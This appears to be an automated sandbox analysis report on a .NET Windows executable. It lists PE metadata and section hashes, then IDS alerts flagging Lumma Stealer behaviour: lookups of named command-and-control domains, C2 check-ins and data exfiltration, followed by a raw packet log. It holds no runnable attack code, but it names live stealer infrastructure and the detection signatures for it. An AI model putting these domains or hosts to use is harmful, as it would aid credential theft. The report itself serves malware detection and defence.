                                                  TLSH:4C741251AF978E39DC3FAA3D94B20A41113057E0AB375E1B7A8C104E5BD7D4B1E22B78
                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....................0..D..........>b... ........@.. .............................. [....`................................
                                                  Icon Hash:00928e8e8686b000
                                                  Entrypoint:0x40623e
                                                  Entrypoint Section:.text
                                                  Digitally signed:false
                                                  Imagebase:0x400000
                                                  Subsystem:windows cui
                                                  Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                  DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                  Time Stamp:0x8ED8AEEC [Mon Dec 11 00:33:48 2045 UTC]
                                                  TLS Callbacks:
                                                  CLR (.Net) Version:
                                                  OS Version Major:4
                                                  OS Version Minor:0
                                                  File Version Major:4
                                                  File Version Minor:0
                                                  Subsystem Version Major:4
                                                  Subsystem Version Minor:0
                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                  Instruction
                                                  jmp dword ptr [00402000h]
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  add byte ptr [eax], al
                                                  NameVirtual AddressVirtual Size Is in Section
                                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x61f00x4b.text
                                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x80000x3f0.rsrc
                                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0xa0000xc.reloc
                                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x61ae0x1c.text
                                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                  .text0x20000x42440x4400ba0e11db73079c2ee285644807363f1eFalse0.49954044117647056data5.843117927150538IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                  .rsrc0x80000x3f00x400665e507479d17a545bb95ee06391cb4dFalse0.4482421875data3.349717922494151IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                  .reloc0xa0000xc0x2006825b36b69c17af67c7cc64afc932607False0.044921875data0.08153941234324169IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                  .bss0xc0000x4e4000x4e4007c0c6e9fa3456dcc01bb1f2c0f1a35fbFalse1.0003307208466454data7.999493104822926IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                                  RT_VERSION0x80580x398OpenPGP Secret KeyEnglishUnited States0.45760869565217394
                                                  DLLImport
                                                  mscoree.dll_CorExeMain
                                                  Language of compilation systemCountry where language is spokenMap
                                                  EnglishUnited States
                                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                  2025-01-14T09:53:03.072390+01002059163ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (owerinternal .sbs)1192.168.2.5560731.1.1.153UDP
                                                  2025-01-14T09:53:03.087067+01002059133ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fraggielek .biz)1192.168.2.5508531.1.1.153UDP
                                                  2025-01-14T09:53:03.099666+01002059135ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (grandiouseziu .biz)1192.168.2.5640081.1.1.153UDP
                                                  2025-01-14T09:53:03.111488+01002059137ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (littlenotii .biz)1192.168.2.5604491.1.1.153UDP
                                                  2025-01-14T09:53:03.124676+01002059141ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (marketlumpe .biz)1192.168.2.5548631.1.1.153UDP
                                                  2025-01-14T09:53:03.140967+01002059143ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nuttyshopr .biz)1192.168.2.5491631.1.1.153UDP
                                                  2025-01-14T09:53:03.153320+01002059145ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (punishzement .biz)1192.168.2.5618401.1.1.153UDP
                                                  2025-01-14T09:53:03.168634+01002059151ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (spookycappy .biz)1192.168.2.5578551.1.1.153UDP
                                                  2025-01-14T09:53:03.179520+01002059153ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (truculengisau .biz)1192.168.2.5620501.1.1.153UDP
                                                  2025-01-14T09:53:03.859561+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549704104.102.49.254443TCP
                                                  2025-01-14T09:53:04.369005+01002858666ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup1192.168.2.549704104.102.49.254443TCP
                                                  2025-01-14T09:53:05.281057+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549705188.114.97.3443TCP
                                                  2025-01-14T09:53:05.682426+01002049836ET MALWARE Lumma Stealer Related Activity1192.168.2.549705188.114.97.3443TCP
                                                  2025-01-14T09:53:05.682426+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549705188.114.97.3443TCP
                                                  2025-01-14T09:53:06.160960+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549707188.114.97.3443TCP
                                                  2025-01-14T09:53:06.622871+01002049812ET MALWARE Lumma Stealer Related Activity M21192.168.2.549707188.114.97.3443TCP
                                                  2025-01-14T09:53:06.622871+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549707188.114.97.3443TCP
                                                  2025-01-14T09:53:07.279472+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549710188.114.97.3443TCP
                                                  2025-01-14T09:53:11.738872+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549715188.114.97.3443TCP
                                                  2025-01-14T09:53:12.936560+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549717188.114.97.3443TCP
                                                  2025-01-14T09:53:14.170083+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549719188.114.97.3443TCP
                                                  2025-01-14T09:53:14.625111+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549719188.114.97.3443TCP
                                                  2025-01-14T09:53:15.387604+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549722188.114.97.3443TCP
                                                  2025-01-14T09:53:15.391858+01002843864ETPRO MALWARE Suspicious Zipped Filename in Outbound POST Request (screen.) M21192.168.2.549722188.114.97.3443TCP
                                                  2025-01-14T09:53:18.968626+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549742188.114.97.3443TCP
                                                  2025-01-14T09:53:19.437834+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549742188.114.97.3443TCP
                                                  TimestampSource PortDest PortSource IPDest IP
                                                  Jan 14, 2025 09:53:03.203972101 CET49704443192.168.2.5104.102.49.254
                                                  Jan 14, 2025 09:53:03.204011917 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:03.204077959 CET49704443192.168.2.5104.102.49.254
                                                  Jan 14, 2025 09:53:03.207330942 CET49704443192.168.2.5104.102.49.254
                                                  Jan 14, 2025 09:53:03.207354069 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:03.859468937 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:03.859560966 CET49704443192.168.2.5104.102.49.254
                                                  Jan 14, 2025 09:53:03.863610983 CET49704443192.168.2.5104.102.49.254
                                                  Jan 14, 2025 09:53:03.863620043 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:03.863979101 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:03.916512012 CET49704443192.168.2.5104.102.49.254
                                                  Jan 14, 2025 09:53:03.921314001 CET49704443192.168.2.5104.102.49.254
                                                  Jan 14, 2025 09:53:03.967330933 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:04.369034052 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:04.369059086 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:04.369065046 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:04.369076967 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:04.369081974 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:04.369263887 CET49704443192.168.2.5104.102.49.254
                                                  Jan 14, 2025 09:53:04.369278908 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:04.369332075 CET49704443192.168.2.5104.102.49.254
                                                  Jan 14, 2025 09:53:04.464071035 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:04.464095116 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:04.464308977 CET49704443192.168.2.5104.102.49.254
                                                  Jan 14, 2025 09:53:04.464335918 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:04.464481115 CET49704443192.168.2.5104.102.49.254
                                                  Jan 14, 2025 09:53:04.469249010 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:04.469341040 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:04.469424963 CET49704443192.168.2.5104.102.49.254
                                                  Jan 14, 2025 09:53:04.469424963 CET49704443192.168.2.5104.102.49.254
                                                  Jan 14, 2025 09:53:04.670404911 CET49704443192.168.2.5104.102.49.254
                                                  Jan 14, 2025 09:53:04.670433044 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:04.670466900 CET49704443192.168.2.5104.102.49.254
                                                  Jan 14, 2025 09:53:04.670473099 CET44349704104.102.49.254192.168.2.5
                                                  Jan 14, 2025 09:53:04.783581972 CET49705443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:04.783696890 CET44349705188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:04.783787012 CET49705443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:04.784673929 CET49705443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:04.784712076 CET44349705188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:05.280961990 CET44349705188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:05.281056881 CET49705443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:05.284787893 CET49705443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:05.284817934 CET44349705188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:05.285187960 CET44349705188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:05.286586046 CET49705443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:05.286640882 CET49705443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:05.286683083 CET44349705188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:05.682456017 CET44349705188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:05.682554960 CET44349705188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:05.682621956 CET49705443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:05.683832884 CET49705443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:05.683862925 CET44349705188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:05.691485882 CET49707443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:05.691531897 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:05.691840887 CET49707443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:05.692152023 CET49707443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:05.692168951 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.160876036 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.160959959 CET49707443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:06.162728071 CET49707443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:06.162739038 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.162936926 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.164067984 CET49707443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:06.164083958 CET49707443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:06.164139032 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.622865915 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.622950077 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.622998953 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.623032093 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.623042107 CET49707443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:06.623059988 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.623068094 CET49707443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:06.623126984 CET49707443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:06.623132944 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.623749971 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.623783112 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.623806953 CET49707443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:06.623815060 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.623908997 CET49707443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:06.629424095 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.682177067 CET49707443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:06.682199001 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.711850882 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.711937904 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.712109089 CET49707443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:06.712132931 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.712151051 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.712229013 CET49707443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:06.712506056 CET49707443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:06.712524891 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.712531090 CET49707443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:06.712536097 CET44349707188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.804819107 CET49710443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:06.804868937 CET44349710188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:06.804984093 CET49710443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:06.805320978 CET49710443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:06.805361032 CET44349710188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:07.279370070 CET44349710188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:07.279472113 CET49710443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:07.326288939 CET49710443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:07.326327085 CET44349710188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:07.326611042 CET44349710188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:07.385235071 CET49710443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:07.412925005 CET49710443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:07.413409948 CET49710443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:07.413469076 CET44349710188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:11.229353905 CET44349710188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:11.229556084 CET44349710188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:11.229629040 CET49710443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:11.229733944 CET49710443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:11.229754925 CET44349710188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:11.254595995 CET49715443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:11.254693031 CET44349715188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:11.254784107 CET49715443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:11.255106926 CET49715443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:11.255141020 CET44349715188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:11.738713980 CET44349715188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:11.738872051 CET49715443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:11.740411043 CET49715443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:11.740422964 CET44349715188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:11.740664005 CET44349715188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:11.748838902 CET49715443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:11.749028921 CET49715443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:11.749073982 CET44349715188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:11.749136925 CET49715443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:11.749142885 CET44349715188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:12.388977051 CET44349715188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:12.389077902 CET44349715188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:12.389153957 CET49715443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:12.389307022 CET49715443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:12.389353037 CET44349715188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:12.460299969 CET49717443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:12.460350990 CET44349717188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:12.460428953 CET49717443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:12.460783958 CET49717443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:12.460797071 CET44349717188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:12.936389923 CET44349717188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:12.936559916 CET49717443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:12.945317030 CET49717443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:12.945341110 CET44349717188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:12.945652008 CET44349717188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:12.946876049 CET49717443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:12.947067976 CET49717443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:12.947108984 CET44349717188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:12.947180986 CET49717443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:12.947196007 CET44349717188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:13.601280928 CET44349717188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:13.601378918 CET44349717188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:13.601488113 CET49717443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:13.601742029 CET49717443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:13.601785898 CET44349717188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:13.685425043 CET49719443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:13.685471058 CET44349719188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:13.685569048 CET49719443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:13.685946941 CET49719443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:13.685964108 CET44349719188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:14.169744968 CET44349719188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:14.170083046 CET49719443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:14.171727896 CET49719443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:14.171740055 CET44349719188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:14.171976089 CET44349719188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:14.173403025 CET49719443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:14.173496962 CET49719443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:14.173501968 CET44349719188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:14.625123024 CET44349719188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:14.625364065 CET44349719188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:14.625446081 CET49719443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:14.625576973 CET49719443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:14.625616074 CET44349719188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:14.898924112 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:14.898979902 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:14.899096966 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:14.899450064 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:14.899466038 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:15.387518883 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:15.387603998 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:15.389019966 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:15.389029026 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:15.389265060 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:15.390537024 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:15.391254902 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:15.391288996 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:15.391381025 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:15.391408920 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:15.391511917 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:15.391534090 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:15.391675949 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:15.391714096 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:15.391849041 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:15.391876936 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:15.392021894 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:15.392060041 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:15.392070055 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:15.392083883 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:15.392245054 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:15.392277002 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:15.392297983 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:15.392446995 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:15.392484903 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:15.401693106 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:15.401918888 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:15.401962042 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:15.401982069 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:15.401987076 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:15.402014971 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:15.402036905 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:15.402112961 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:18.473360062 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:18.473612070 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:18.473773003 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:18.474039078 CET49722443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:18.474057913 CET44349722188.114.97.3192.168.2.5
                                                  Jan 14, 2025 09:53:18.479507923 CET49742443192.168.2.5188.114.97.3
                                                  Jan 14, 2025 09:53:18.479558945 CET44349742188.114.97.3192.168.2.5
